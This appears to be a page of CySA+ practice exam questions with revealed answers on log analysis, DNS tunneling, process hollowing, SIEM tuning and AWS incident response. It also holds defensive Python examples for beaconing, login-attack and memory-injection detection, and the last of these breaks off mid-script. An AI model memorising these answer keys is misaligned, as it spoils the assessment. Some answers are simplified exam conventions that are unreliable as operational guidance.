CCNA Cysa Security Operations Questions

75 of 165 questions · Page 2/3 · Cysa Security Operations topic · Answers revealed

76
MCQ · easy

Which of the following log sources would be most useful for detecting DNS tunneling?

A.DNS logs
B.Firewall logs
C.Authentication logs
D.Endpoint EDR logs
Answer: A

DNS logs contain queries and responses needed to detect tunneling.

Why this answer

DNS tunneling encodes data in queries and responses, so the resolver's query logs are where it shows: long, high-entropy subdomain labels under one parent domain, a high query rate to that domain, and unusual record types such as TXT or NULL. Firewall logs only show that port 53 traffic occurred, not what was asked.

77
MCQ · medium

An analyst detects a process named 'powershell.exe' executing a base64-encoded command. Which type of analysis is most appropriate to decode and understand the command?

A.Process analysis
B.Memory analysis
C.Registry analysis
D.Network traffic analysis
Answer: A

Correct. Process analysis involves examining command-line arguments and decoding scripts.

Why this answer

Base64-encoded commands are common in PowerShell attacks. Decoding and reading the script is part of endpoint analysis, specifically process analysis. Note that -EncodedCommand takes the base64 of the script's UTF-16LE bytes, so a plain base64 decode yields text interleaved with NUL bytes; decode it as UTF-16LE.

78
Multi-Select · medium

A security analyst is investigating a potential data exfiltration using DNS. Which TWO indicators are most consistent with DNS tunneling?

Select 2 answers
A.Frequent NXDOMAIN responses
B.DNS responses with unusually large payload sizes
C.Unusually high volume of DNS queries to a single domain
D.Queries for domains with unusual top-level domains (e.g., .tk)
E.Multiple queries from different hosts to the same legitimate domain
Answers: B, C

Large response sizes can carry exfiltrated data.

Why this answer

DNS tunneling encodes data in the query (long subdomain labels) and in the response (TXT or other large records), so high query volume to one domain and oversized answers are the consistent pair. Unusual TLDs are a weak reputation signal at best, and a burst of NXDOMAIN responses points to a DGA rather than to tunneling, which needs its queries to resolve.

79
Multi-Select · hard

During a memory forensics investigation, a security analyst identifies a process that appears to have code injected into it. The process is 'explorer.exe' and its memory contains sections that are not part of the original executable. Which TWO memory analysis techniques should the analyst use to confirm code injection?

Select 2 answers
A.List the process's open handles
B.Examine the process's environment variables
C.Check the process's parent process
D.Scan for executable memory pages not backed by a file on disk
E.Compare the loaded DLL list with known good baselines
Answers: D, E

Injected code often resides in memory without a corresponding file.

Why this answer

Comparing the process's loaded DLL list with the expected list can reveal anomalies. Checking for executable memory pages that are not backed by a known module is another indicator.

80
MCQ · medium

A security analyst is investigating an alert from the EDR tool indicating that a process named 'powershell.exe' was launched with a parent process 'winword.exe'. The user's workstation had received a phishing email earlier that day. Which type of attack does this likely indicate?

A.Process hollowing
B.Living off the land binary (LOLBin) abuse
C.Injection of code into explorer.exe
D.Scheduled task creation
Answer: B

PowerShell is a LOLBin, and Word spawning it points to a malicious macro; Word has no legitimate reason to launch a shell.

Why this answer

The parent-child relationship of winword.exe spawning powershell.exe is a classic indicator of a malicious macro executing PowerShell code, often used in phishing attacks.

81
MCQ · medium

A cloud security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address. The instance is part of an auto-scaling group. What is the best immediate action?

A.Isolate the instance by modifying its security group to deny all traffic.
B.Terminate the instance immediately to stop the threat.
C.Ignore the alert because auto-scaling groups are ephemeral.
D.Update the GuardDuty threat list to ignore that IP.
Answer: A

Correct. Isolation stops communication while preserving the instance for forensic analysis.

Why this answer

Isolating the instance means swapping its security groups for a quarantine group with no inbound or outbound rules (security groups are default-deny, so an empty group blocks everything); moving it to a forensic VPC is the alternative. Before changing anything, place the instance in Standby in its Auto Scaling group (or detach it) so a failed health check does not terminate and replace it, and snapshot its EBS volumes. Terminating the instance destroys the evidence.

82
MCQ · medium

An analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address. The analyst checks the VPC Flow Logs and confirms the communication. What is the next best step in the investigation?

A.Run a vulnerability scan on the instance.
B.Ignore the alert because GuardDuty often produces false positives.
C.Isolate the EC2 instance from the network.
D.Delete the EC2 instance immediately.
Answer: C

Isolation stops the communication and allows for further investigation without destroying data.

Why this answer

GuardDuty plus confirming flow logs makes the communication a true positive, so contain first: isolate the instance by changing its security groups (or moving it to a quarantine subnet) so it can no longer reach the attacker while memory and disk remain available for forensics. Stopping the instance also ends the communication but discards volatile memory, and deleting it destroys the evidence. A vulnerability scan belongs to root-cause analysis later.

83
MCQ · medium

A security analyst notices repeated alerts for 'DNS query to known malicious domain' from multiple internal hosts. Upon investigation, the analyst finds that the domain is legitimate and used by a third-party service. What should the analyst do to reduce false positives?

A.Add the domain to a whitelist in the SIEM
B.Disable the alert rule for DNS queries
C.Increase the severity of the alert
D.Block the domain on the firewall
Answer: A

Whitelisting prevents false positives for known legitimate domains.

Why this answer

Adding the specific domain to a whitelist (an exception) keeps the rule active for every other domain while suppressing the known-good traffic. Scope the exception to the exact FQDN and record why it was added; disabling the rule or blocking a domain the business relies on are both wrong.

84
MCQ · hard

An analyst is investigating a potential compromise on a Windows endpoint. EDR telemetry shows that 'powershell.exe' was launched by 'svchost.exe', which in turn was spawned by 'services.exe'. The analyst observes that 'powershell.exe' then executed a script that downloaded an executable. What should the analyst be most concerned about?

A.Services.exe spawning svchost.exe is a sign of malware infection
B.Powershell.exe downloading an executable is a false positive from Windows Update
C.This indicates a potential LOLBin attack using svchost.exe to launch powershell.exe
D.Svchost.exe spawning powershell.exe is a normal Windows operation
Answer: C

PowerShell launched from an unexpected parent and then downloading an executable is the living-off-the-land pattern to chase.

Why this answer

Svchost.exe hosts Windows services, not interactive shells, so svchost.exe launching powershell.exe deserves attention. One caveat: scheduled tasks run as children of the svchost.exe instance that hosts the Schedule service, so this parent-child pair by itself can be a legitimate task. Check which service that svchost.exe hosts (its -s argument) and whether a task launched PowerShell; the script downloading an executable is what turns this into a likely compromise.

85
MCQ · medium

During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF that blocks the attack vector. The system owner states the vulnerability is not exploitable due to the compensating control. Which of the following is the best next step?

A.Re-run the scan with a non-credentialed profile
B.Document the finding and accept the risk with the compensating control
C.Ignore the vulnerability and close the finding
D.Immediately patch the server during business hours
Answer: B

Correct. The vulnerability is mitigated by the WAF, so risk acceptance with documentation is appropriate.

Why this answer

A compensating control does not make the finding a false positive: the vulnerability is real, but the WAF lowers the likelihood of exploitation. Document the finding, verify that the WAF rule actually blocks the specific attack vector (test it), accept the residual risk formally with an owner and a review date, and still schedule the patch for a maintenance window rather than patching unplanned during business hours.

86
Multi-Select · easy

A security analyst is tuning a SIEM correlation rule that triggers on failed login attempts. The rule is generating a high number of alerts from a specific user who frequently mistypes passwords. The analyst wants to reduce false positives while maintaining detection of brute-force attacks. Which TWO actions should the analyst take?

Select 2 answers
A.Delete the correlation rule and create a new one from scratch
B.Exclude the specific user account from the rule
C.Increase the threshold of failed attempts within a time window
D.Change the rule to alert on every single failed login
E.Increase the severity of the rule to trigger an immediate response
Answers: B, C

Excluding the known user eliminates false positives from that account.

Why this answer

Raising the threshold so that a handful of mistypes inside the time window no longer fires keeps the rule effective against real brute force, which produces far more failures. Excluding the specific account removes that user's noise, but scope the exclusion narrowly (that account from that user's usual source) and review it periodically, because a blanket exclusion also hides an attacker who targets that account.

87
MCQ · hard

An analyst is reviewing a YARA rule that triggers on a specific string pattern in memory. The rule has a high false positive rate. Which of the following actions would best reduce false positives while maintaining detection capability?

A.Add a condition that requires the string to appear with another indicator
B.Convert the rule to a Sigma rule
C.Remove the rule from active use
D.Increase the string length in the rule
Answer: A

Using multiple conditions makes the rule more specific.

Why this answer

Adding conditions to refine the rule, such as requiring the string to be in a specific memory section or alongside other indicators, can reduce false positives.

88
MCQ · medium

A security analyst notices that a firewall log shows outbound traffic from an internal server to an external IP address on TCP port 443, but the server is not configured to make any outbound connections. The analyst checks previous logs and finds similar connections every 60 minutes. What type of activity is most likely occurring?

A.Beaconing to a command-and-control server
B.Normal software update check
C.DNS tunneling
D.Data exfiltration via FTP
Answer: A

Beaconing involves periodic connections to a C2 server, often on port 443 to blend in with HTTPS traffic.

Why this answer

Regular check-ins to an external IP on a common port like 443 are typical of beaconing to a C2 server. The tell is the timing: near-constant intervals with little jitter and small, similar-sized connections from a host that should not be initiating outbound sessions at all. Update checks also recur, so confirm the destination (ownership, reputation, certificate) before closing the alert either way.
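The timing analysis behind Q88, as an added example that is not from the original page: group firewall records by source, destination and port, compute the inter-arrival times, and flag flows whose interval barely varies. The log lines are constructed in a simplified one-line format, with one hourly beacon and one chatty but irregular legitimate flow; the thresholds are illustrative starting points, not values from the page.

```python
"""Spot beaconing in firewall logs by inter-arrival regularity (Python 3.8+, stdlib only)."""
from collections import defaultdict
from datetime import datetime, timedelta
import statistics

LOG_FORMAT = "{ts} ALLOW TCP {src} -> {dst}:{port}"   # simplified, constructed line format


def _build_log():
    """Constructed records (not from the page): an hourly beacon plus irregular legitimate browsing."""
    lines = []
    t = datetime(2024, 3, 1, 8, 0, 0)
    for j in (0, 2, -1, 3, 0, -2, 1, 0, 2, -1, 0):       # a few seconds of jitter per check-in
        lines.append(LOG_FORMAT.format(ts=(t + timedelta(seconds=j)).isoformat(),
                                       src="10.20.1.15", dst="203.0.113.9", port=443))
        t += timedelta(hours=1)
    t = datetime(2024, 3, 1, 8, 0, 0)
    for gap in (12, 340, 5, 67, 900, 3, 44, 210, 15, 1200, 8):   # human-driven, irregular
        t += timedelta(seconds=gap)
        lines.append(LOG_FORMAT.format(ts=t.isoformat(), src="10.20.1.22",
                                       dst="198.51.100.20", port=443))
    return lines


SAMPLE_LOG = _build_log()


def parse(line):
    ts, _action, _proto, src, _arrow, dst_port = line.split()
    dst, port = dst_port.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, dst, int(port)


def find_beacons(lines, min_events=6, max_jitter_ratio=0.1, min_interval=30):
    """Flag (src, dst, port) flows with enough events whose intervals vary by less than max_jitter_ratio."""
    flows = defaultdict(list)
    for line in lines:
        ts, src, dst, port = parse(line)
        flows[(src, dst, port)].append(ts)
    beacons = []
    for (src, dst, port), times in flows.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean < min_interval:               # sub-30s chatter is usually keep-alives, handled elsewhere
            continue
        cv = statistics.pstdev(gaps) / mean  # coefficient of variation: machines keep time, people do not
        if cv <= max_jitter_ratio:
            beacons.append({"src": src, "dst": dst, "port": port, "events": len(times),
                            "period_s": round(mean), "jitter_cv": round(cv, 4)})
    return beacons


if __name__ == "__main__":
    for b in find_beacons(SAMPLE_LOG):
        print(b)
```

Real implants add deliberate jitter, so in production the ratio is tuned per environment and combined with byte-count uniformity and destination reputation rather than used alone.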

89
MCQ · medium

An analyst is investigating a potential data exfiltration via DNS. Which tool would best help identify DNS tunnelling by analyzing packet payloads and query patterns?

A.Wireshark
B.tcpdump
C.nmap
D.NetFlow
Answer: A

Correct. Wireshark captures full packets for deep analysis.

Why this answer

Wireshark can capture and analyze DNS packets in detail, including payload and query patterns, making it suitable for detecting DNS tunnelling.

90
MCQ · medium

A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on an internal web server. The server is not internet-facing and is protected by a compensating control: a web application firewall (WAF) that blocks the attack vector. What should the analyst recommend?

A.Schedule an immediate emergency patch
B.Remove the WAF to ensure the vulnerability is addressed
C.Document the compensating control and reduce the risk rating
D.Ignore the finding because it is a false positive
Answer: C

Proper risk management involves documenting controls and adjusting risk.

Why this answer

The vulnerability has a high CVSS score, but the compensating control (WAF) reduces the risk. The analyst should document the control, verify that the WAF rule covers the attack vector, and lower the risk rating for the finding rather than patching immediately if that would cause downtime; the finding stays open until the patch is applied in a scheduled window. CVSS measures severity, not the risk in this environment.

91
MCQ · hard

An analyst is reviewing a packet capture and observes a series of TCP SYN packets sent to a server, each followed by a SYN-ACK from the server, but no ACK from the client. The source IP is spoofed. What type of attack is most likely occurring?

A.Man-in-the-middle attack
B.DNS amplification attack
C.TCP SYN flood attack
D.TCP reset attack
Answer: C

The pattern of SYN, SYN-ACK, and no ACK from spoofed IPs is classic SYN flood.

Why this answer

A SYN flood attack involves sending many SYN packets with spoofed IPs, causing the server to allocate resources for half-open connections. The lack of final ACK indicates the client never completes the handshake, exhausting server resources.

92
MCQ · medium

A security analyst is triaging a SIEM alert for 'Multiple failed logins followed by a successful login from a remote IP'. The successful login occurs after 10 failed attempts. What is the most likely classification?

A.True positive for a brute-force attack
B.False positive due to a misconfigured application
C.False positive due to user error
D.True positive for a password spraying attack
Answer: A

Correct. This is indicative of a brute-force attack.

Why this answer

Multiple failures followed by a success from one remote IP against one account is the signature of a brute-force attack that worked, so the alert is a true positive. Password spraying looks different: one or two attempts per account spread across many accounts. Treat the account as compromised: reset the credential, review what the session did, and block the source.
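The rule tuning in Q86 and the classification in Q92, as one added example not taken from the page: a sliding-window correlation that alerts when a success follows a threshold of failures for the same account and source, with the exclusion scoped to an account/source pair rather than to the whole account, plus a separate check for the password-spraying pattern Q92 contrasts it with. Usernames, IPs and timings are constructed.

```python
"""Failed-logon correlation with threshold, window and scoped exclusions (Python 3.8+, stdlib only)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta


def _ev(hms, user, src, ok):
    """Constructed authentication event (not from the page): time, account, source IP, outcome."""
    return {"ts": datetime.fromisoformat("2024-03-01T" + hms), "user": user, "src": src, "ok": ok}


EVENTS = (
    # jdoe mistypes six times in three minutes, then gets in: the noisy-but-benign user from Q86.
    [_ev(t, "jdoe", "10.0.5.17", False)
     for t in ("08:00:05", "08:00:40", "08:01:10", "08:01:30", "08:02:00", "08:02:20")]
    + [_ev("08:02:40", "jdoe", "10.0.5.17", True)]
    # One remote IP hammers svc_backup: ten failures in 45 seconds, then success (Q92).
    + [_ev(f"03:12:{s:02d}", "svc_backup", "203.0.113.50", False) for s in range(0, 50, 5)]
    + [_ev("03:12:55", "svc_backup", "203.0.113.50", True)]
    # One failure each against six accounts from one IP inside a minute: spraying, not brute force.
    + [_ev(f"05:00:{i * 10:02d}", f"user{i}", "198.51.100.8", False) for i in range(6)]
)


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=10), exclude=frozenset()):
    """Alert when a success follows >= threshold failures for the same (account, source) in the window."""
    failures = defaultdict(deque)
    alerts = []
    for e in sorted(events, key=lambda x: x["ts"]):
        key = (e["user"], e["src"])
        if key in exclude:          # exclusion is per account *and* source, not per account
            continue
        q = failures[key]
        while q and e["ts"] - q[0] > window:   # drop failures that fell out of the window
            q.popleft()
        if not e["ok"]:
            q.append(e["ts"])
        elif len(q) >= threshold:
            alerts.append({"type": "brute_force_success", "user": e["user"], "src": e["src"],
                           "failures": len(q), "at": e["ts"].isoformat()})
            q.clear()
    return alerts


def detect_spray(events, min_users=5, window=timedelta(minutes=30)):
    """Password spraying: one source, few failures each, many distinct accounts in the window."""
    by_src = defaultdict(list)
    for e in events:
        if not e["ok"]:
            by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        evs.sort(key=lambda x: x["ts"])
        for i, first in enumerate(evs):
            users = {x["user"] for x in evs[i:] if x["ts"] - first["ts"] <= window}
            if len(users) >= min_users:
                alerts.append({"type": "password_spray", "src": src, "users": len(users),
                               "at": first["ts"].isoformat()})
                break
    return alerts


if __name__ == "__main__":
    print(detect_bruteforce(EVENTS))
    print(detect_bruteforce(EVENTS, exclude={("jdoe", "10.0.5.17")}))
    print(detect_spray(EVENTS))
```

With the defaults both jdoe and svc_backup fire; either knob from Q86 (raising the threshold to 8, or excluding jdoe from her own workstation) silences jdoe while the real attack still alerts, and the spray detector catches the pattern the brute-force rule is blind to.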

93
Multi-Select · hard

A security analyst is using osquery to hunt for persistence mechanisms on a Windows endpoint. Which THREE Windows artifacts should the analyst query to identify common persistence locations? (Select THREE.)

Select 3 answers
A.Scheduled tasks in the Task Scheduler
B.Windows Event Logs for login events
C.Network connections from the endpoint
D.Registry key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
E.Services listed in the Service Control Manager
Answers: A, D, E

Correct. Scheduled tasks are a common persistence mechanism.

Why this answer

Registry Run keys (T1547.001), scheduled tasks (T1053.005), and services (T1543.003) are common persistence mechanisms. In osquery they map to the registry, scheduled_tasks and services tables (startup_items also covers Run keys and Startup folders, but the Startup folder is not offered as an option here). Logon events and network connections describe activity, not persistence.

94
MCQ · medium

An analyst is investigating a suspicious email attachment. The sandbox analysis shows that the document drops a binary that connects to an external IP on port 4444. Which network analysis tool is best suited to confirm if any internal hosts are communicating on that port?

A.tcpdump
B.nmap
C.Wireshark
D.NetFlow analyzer
Answer: D

NetFlow provides aggregated flow records, enabling quick searches for traffic on a specific port.

Why this answer

NetFlow collects metadata about network flows, including destination IP and port, enabling analysts to query for all traffic on a specific port across the network.

95
MCQ · medium

A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an external IP address on port 22. Upon investigation, the analyst finds the workstation is used by a developer who frequently transfers large files to a remote server via SCP. What is the most appropriate classification for this alert?

A.True positive
B.True negative
C.False positive
D.False negative
Answer: C

The alert is triggered by legitimate SCP transfers.

Why this answer

The alert is triggered by legitimate administrative activity (SCP file transfer), so it is a false positive. The analyst should tune the SIEM to reduce similar alerts.

96
MCQ · medium

During a traffic analysis, a security analyst observes repeated outbound connections from an internal workstation to an external IP address on TCP port 53 at irregular intervals. The connections are small and occur every few minutes. Which technique is most likely being used?

A.HTTP smuggling
B.TCP handshake anomaly
C.DNS tunneling
D.Beaconing
Answer: C

Sustained TCP port 53 traffic to an external host that is not the configured resolver is what makes this look like DNS tunneling.

Why this answer

DNS normally uses UDP, with TCP reserved for zone transfers and responses too large for UDP, so a workstation holding a recurring pattern of small TCP/53 connections to a single external IP rather than to its resolver suggests data encoded in DNS traffic. Confirm by checking whether the payload is actually DNS, what names are queried, and whether the IP belongs to any sanctioned resolver. The recurring timing overlaps with beaconing; the port and protocol point to tunneling as the channel.

97
MCQ · medium

A CASB alert indicates that a user downloaded a file containing sensitive data from a cloud app to an unmanaged device. Which action should the analyst take first?

A.Report the incident to law enforcement
B.Reset the user's password
C.Block the user's cloud app access
D.Investigate the alert to confirm the data exfiltration
Answer: D

Confirmation is necessary before taking action.

Why this answer

The first step is to verify the alert is a true positive by checking the user's activity and the file's sensitivity. Prematurely blocking or reporting may be incorrect if the alert is a false positive.

98
MCQ · medium

During a network traffic analysis, a security analyst observes repeated connections from an internal host to an external IP address on TCP port 53. The traffic volume is low but consistent. What type of anomaly is most likely indicated?

A.Data exfiltration via DNS tunneling
B.Lateral movement using SMB
C.Port scan activity from an internal host
D.Beaconing to a command-and-control server
Answer: A

DNS tunneling uses port 53 and is a common data exfiltration technique, consistent with the pattern observed.

Why this answer

DNS tunneling uses port 53 to exfiltrate data by encoding it in DNS queries and responses. Consistent low-volume traffic to a single external IP that is not the organization's resolver suggests a covert channel; verify that the traffic is genuinely DNS and inspect the query names, since TCP/53 to an unknown host could also be a C2 channel using the port only to pass the firewall.

99
Multi-Select · medium

An analyst is creating a Sigma rule to detect suspicious use of rundll32.exe to execute DLL files from temporary directories. Which TWO fields should the analyst include in the rule to minimize false positives?

Select 2 answers
A.File Size: > 1 MB
B.Parent Process: explorer.exe
C.Process Name: rundll32.exe
D.Image Path: C:\Windows\System32\rundll32.exe
E.Command Line: contains *\Temp\*.dll
Answers: C, E

Targeting rundll32.exe reduces false positives from other processes.

Why this answer

To avoid false positives, the rule should specify the process name (rundll32.exe) and the command-line argument containing a path to a temp directory, as legitimate uses rarely involve DLLs from temp folders.

100
Multi-Select · medium

During a cloud security investigation, a security analyst notices unusual API calls from a compromised IAM user in AWS. The analyst wants to determine the scope of the breach and identify affected resources. Which TWO cloud-native services should the analyst use?

Select 2 answers
A.AWS Shield
B.AWS CloudTrail
C.AWS WAF
D.AWS Config
E.Amazon GuardDuty
Answers: B, E

CloudTrail logs all API calls and is essential for auditing user activity.

Why this answer

AWS CloudTrail records every API call with the principal, access key, source IP and user agent, so filtering on the compromised user shows what was done and to which resources. GuardDuty ties its findings to the same principal and flags further anomalous calls. AWS Config can then show how affected resources changed, but the two primary investigation sources are CloudTrail and GuardDuty; Shield and WAF are DDoS and web-filtering controls, not investigation tools.

101
MCQ · easy

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address to a domain controller at 3:00 AM. The user associated with the account is on vacation. Which classification best describes this alert?

A.False positive
B.False negative
C.True negative
D.True positive
Answer: D

The alert fired on activity that is genuinely anomalous, so it is a true positive.

Why this answer

The alert is triggered by a real failed login attempt from an internal IP while the account's owner is away, so it is a true positive: the rule correctly flagged activity worth investigating. That does not yet make it a confirmed compromise; a device the user left running with a cached credential can produce the same single failure, so check the source host before escalating.

102
MCQ · hard

During memory analysis of a compromised host, an analyst finds a process that appears to be 'svchost.exe' but with an unusual parent process (not 'services.exe'). The process also has injected code in its memory. What is the most likely explanation?

A.The process is a legitimate svchost.exe but spawned by a different service
B.The svchost.exe is a hollowed process used for malicious purposes
C.The process is a DLL injection into svchost.exe
D.The svchost.exe process is a false positive due to a known Windows bug
Answer: B

Correct. Process hollowing replaces legitimate process memory.

Why this answer

Genuine svchost.exe instances are always children of services.exe and run from C:\Windows\System32. A process with that name and a different parent was started by something else, and combined with foreign code in its memory the best explanation among the options is process hollowing: a legitimate binary started suspended, its image replaced with attacker code, then resumed. Confirm by comparing the in-memory PE header and image path with the on-disk file.

103
MCQ · medium

A cloud security analyst reviews AWS CloudTrail logs and notices multiple 'RunInstances' API calls from a single IAM user creating EC2 instances with public IP addresses in an unusual region. What is the most likely concern?

A.The user's credentials may be compromised and used for cryptomining
B.The user is performing legitimate scaling operations
C.The user is provisioning resources for a new project
D.The user is testing disaster recovery procedures
Answer: A

Cryptominers often use compromised credentials to launch instances in regions the account does not normally use, where the activity is less likely to be noticed.

Why this answer

Creating instances in an unusual region, with public IPs, from a single IAM user is a classic sign of compromised credentials being used for cryptomining or other abuse. Compare with the user's normal activity, check whether a new access key was created, and confirm with the user before treating it as legitimate provisioning.

104
MCQ · medium

An analyst reviews AWS CloudTrail logs and detects multiple 'CreateNetworkAclEntry' API calls from a user who does not typically perform network administration. What type of activity is this?

A.Cloud misconfiguration
B.Privilege escalation or lateral movement
C.Normal administrative activity
D.Data exfiltration via NACL
Answer: B

Correct. Unauthorized network changes could indicate privilege escalation.

Why this answer

Unusual API calls from a user outside their normal role may indicate privilege abuse or a compromised account.

105
MCQ · medium

An analyst is creating a YARA rule to detect a specific malware family that uses the string 'evil' in its PE file. Which of the following rule structures is correct?

A.rule detect_malware { strings: $a = "evil" condition: $a }
B.rule detect_malware { strings: "evil" condition: $a }
C.rule detect_malware { condition: $a = "evil" }
D.if "evil" in file then alert
Answer: A

Correct structure: rule name, strings section with identifier, condition using identifier.

Why this answer

A YARA rule is introduced with the rule keyword and a name, declares its patterns in a strings: section with $-prefixed identifiers, and references those identifiers in a condition: section; the meta: section is optional. Option B gives the string no identifier, option C puts the definition inside the condition, and option D is not YARA syntax.

106
Multi-Select · medium

A security team is tuning a SIEM rule that alerts on all outbound connections to IP addresses classified as 'high risk' by threat intelligence. The rule generates many false positives because some legitimate services use these IPs. Which two actions should the analyst take to reduce false positives? (Select TWO.)

Select 2 answers
A.Ignore the false positives and continue
B.Increase the risk score threshold to only alert on very high risk IPs
C.Expand the rule to include all risky IPs
D.Add known legitimate IP addresses to an exclusion list
E.Disable the rule
Answers: B, D

Raising the threshold reduces alerts from borderline IPs.

Why this answer

Adding known legitimate IP addresses to an exclusion list (D) and raising the risk-score threshold (B) reduce false positives without disabling the rule. Disabling the rule (E) removes detection, ignoring the alerts (A) is not tuning, and expanding to all risky IPs (C) would increase false positives.

107
MCQ · medium

During a threat hunting exercise, the hunter creates a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which ATT&CK technique should the hunter focus on?

A.T1566.001 (Spearphishing Attachment)
B.T1059.001 (PowerShell)
C.T1053.005 (Scheduled Task)
D.T1547.001 (Registry Run Keys)
Answer: C

Correct. This is the ATT&CK technique for persistence via scheduled tasks.

Why this answer

Scheduled tasks are a persistence technique (T1053.005). The hunter should focus on the persistence tactic and the specific technique for scheduled tasks.

108
MCQ · hard

An analyst is reviewing a memory dump from a compromised workstation and finds a process that appears to be a legitimate system process but has a different parent process and is running from a non-standard location. Which analysis technique is most appropriate?

A.Perform a YARA scan on the process memory
B.Compare the process's command line with baseline
C.Analyze network connections from the process
D.Check the process's digital signature
Answer: A

YARA rules can detect malicious code injected into the process memory, even if the binary itself is signed.

Why this answer

Process hollowing creates a legitimate process in a suspended state, replaces its memory with malicious code, and resumes it, which fits the parent and path anomalies seen here. Those anomalies raise the suspicion; confirming it means examining what is actually executing in memory, and a YARA scan of the process memory can match the injected code against known malware signatures regardless of how the on-disk file looks.

109
MCQ · hard

An analyst suspects a process hollowing attack on an endpoint. Which of the following EDR telemetry findings would best support this hypothesis?

A.A legitimate process (e.g., svchost.exe) created in a suspended state and later resumed with changed memory contents
B.A process with the same name as a Windows system process but running from a temporary directory
C.A process injecting code into a legitimate running process
D.An unknown process making network connections to multiple internal IPs
Answer: A

Creation in suspended state with memory modification is classic hollowing indicator.

Why this answer

Process hollowing creates a legitimate process in a suspended state, replaces its memory with malicious code, then resumes it. The on-disk image and path stay legitimate, so the indicator is the sequence itself: suspended creation followed by the memory image diverging from the file. Option B describes masquerading from a non-standard path, and option C describes generic code injection into an already running process.

110
Multi-Select · hard

A security analyst is investigating a potential advanced persistent threat (APT) that uses living off the land binaries (LOLBins). The EDR has flagged several processes. Which THREE process behaviors are most indicative of LOLBin abuse? (Choose THREE.)

Select 3 answers
A.mshta.exe executing JavaScript from a remote URL
B.explorer.exe opening the Start menu
C.notepad.exe opening a .txt file in the user's Documents folder
D.wmic.exe creating a process on a remote system
E.certutil.exe downloading an executable from a remote server
Answers: A, D, E

Correct. MSHTA can run scripts, often used by attackers.

Why this answer

LOLBin abuse means using native tools in ways their normal users never would: mshta.exe pulling script from a remote URL, wmic.exe creating a process on a remote system (remote execution), and certutil.exe fetching an executable (a download cradle). Explorer opening the Start menu and Notepad opening a text file are the binaries doing their jobs.

111
MCQ · hard

During a threat hunting engagement, an analyst creates a hypothesis based on a recent threat intelligence report about a new APT group using DLL side-loading for persistence. The analyst decides to search for processes that have loaded a known vulnerable DLL. Which framework is most appropriate to map the TTPs?

A.Diamond Model
B.NIST CSF
C.MITRE ATT&CK
D.Cyber Kill Chain
Answer: C

ATT&CK provides a detailed taxonomy of techniques used by APT groups.

Why this answer

MITRE ATT&CK is the most comprehensive framework for mapping adversary TTPs, including persistence techniques like DLL side-loading (T1574.002).

112
MCQ · hard

An analyst is investigating a suspected data exfiltration via HTTP. The analyst examines a PCAP file and finds a series of HTTP POST requests to an external site with varying 'Content-Length' values. The payloads appear to be base64-encoded strings. Which tool would be most effective for extracting and decoding the payloads for analysis?

A.Wireshark
B.Python with scapy
C.tcpdump
D.NetFlow
Answer: B

Scapy allows programmatic extraction of HTTP payloads and base64 decoding, making it ideal for this task.

Why this answer

Python with scapy allows custom scripting to extract and decode payloads from PCAP files.

113
MCQ · medium

During a memory analysis of a potentially compromised host, a security analyst finds a process with an executable image that is not present on disk. Which technique is most likely being observed?

A.Reflective DLL injection
B.Process hollowing
C.API hooking
D.DLL injection
Answer: B

Process hollowing replaces the process's memory image with malicious code, so what is executing no longer matches the file on disk.

Why this answer

Process hollowing creates a legitimate process in a suspended state, then replaces its memory with malicious code, so the main executable image in memory no longer corresponds to the file on disk. Reflective DLL injection also produces a module with no file behind it, but as an additional unbacked region inside an otherwise intact process; when the process's own image is what fails to match disk, hollowing is the better fit.
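The two checks from Q79, and the hollowing indicator discussed in Q109 and Q113, as one added example that is not part of the page. It works on a constructed snapshot of the kind of per-region data a memory-forensics tool reports (protection, backing file, first bytes), in the spirit of Volatility's malfind and module-listing plugins but without reproducing their output format: executable regions with no file behind them, modules absent from a clean baseline, and a main image whose header no longer matches the on-disk file. Hashes, addresses and paths are made up.

```python
"""Triage a process memory snapshot for injected or hollowed code (Python 3.8+, stdlib only)."""

EXEC_PROTECTIONS = {"PAGE_EXECUTE", "PAGE_EXECUTE_READ", "PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY"}

# Constructed snapshot of explorer.exe (not from the page), reduced to the fields the checks need.
EXPLORER = {
    "pid": 4120,
    "image_path": r"C:\Windows\explorer.exe",
    "main_image_header_on_disk": "a1" * 32,          # hash of the PE header as stored on disk
    "regions": [
        {"base": 0x7FF6A0000000, "size": 0x400000, "protect": "PAGE_EXECUTE_WRITECOPY",
         "file": r"C:\Windows\explorer.exe", "header_hash": "a1" * 32, "head": b"MZ"},
        {"base": 0x7FFDE0000000, "size": 0x1F0000, "protect": "PAGE_EXECUTE_READ",
         "file": r"C:\Windows\System32\ntdll.dll", "header_hash": None, "head": b"MZ"},
        {"base": 0x1C3A0000, "size": 0x3C000, "protect": "PAGE_EXECUTE_READWRITE",
         "file": None, "header_hash": None, "head": b"MZ"},            # manually mapped PE
        {"base": 0x1C400000, "size": 0x1000, "protect": "PAGE_EXECUTE_READWRITE",
         "file": None, "header_hash": None, "head": b"\xfc\x48\x83"},  # raw shellcode stub
        {"base": 0x1C500000, "size": 0x10000, "protect": "PAGE_READWRITE",
         "file": None, "header_hash": None, "head": b"\x00\x00"},      # ordinary heap, benign
    ],
    "modules": [r"C:\Windows\explorer.exe", r"C:\Windows\System32\ntdll.dll",
                r"C:\Windows\System32\kernel32.dll", r"C:\Users\Public\Libraries\ntshrui64.dll"],
}

# Constructed baseline of modules a clean explorer.exe loads on this build.
BASELINE_MODULES = {r"C:\Windows\explorer.exe", r"C:\Windows\System32\ntdll.dll",
                    r"C:\Windows\System32\kernel32.dll", r"C:\Windows\System32\ntshrui.dll"}


def unbacked_executable_regions(regions):
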